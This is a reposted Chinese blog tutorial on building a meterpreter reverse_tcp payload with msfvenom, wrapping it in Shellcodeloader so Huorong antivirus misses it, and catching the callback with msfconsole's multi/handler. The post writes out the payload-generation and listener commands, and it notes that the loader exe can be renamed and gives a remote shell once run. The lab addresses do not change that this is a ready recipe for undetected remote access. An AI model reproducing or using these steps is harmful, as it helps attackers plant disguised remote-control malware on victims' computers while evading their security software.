Shellcodeloader免杀过火绒

admin 2022年3月29日09:16:24评论253 views字数 609阅读2分1秒阅读模式

题记

        今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。

环境

        Kali:192.168.0.119 win10:192.168.0.200

        工具地址:https://github.com/knownsec/shellcodeloader

步骤

1、在kali生成3.bin木马。

        msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

Shellcodeloader免杀过火绒

Shellcodeloader免杀过火绒

2、把木马移到工具上做免杀。

Shellcodeloader免杀过火绒

Shellcodeloader免杀过火绒

Shellcodeloader免杀过火绒

生成loder.exe软件,可随意改名,运行就能上线。

Shellcodeloader免杀过火绒

3、kali开启监听。

        msfconsole

        use exploit/multi/handler

        set payload windows/x64/meterpreter/reverse_tcp

        set lhost 192.168.0.119

        exploit

        然后运行exe

        上线

Shellcodeloader免杀过火绒

4、火绒检测

Shellcodeloader免杀过火绒

        软件运行后检测。

Shellcodeloader免杀过火绒

作者:@11阳光本文为作者原创,转载请注明出处:https://www.cnblogs.com/sunny11/p/14105624.html


推荐↓↓↓

原文始发于微信公众号(LemonSec):Shellcodeloader免杀过火绒

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月29日09:16:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Shellcodeloader免杀过火绒https://cn-sec.com/archives/847410.html

发表评论

匿名网友 填写信息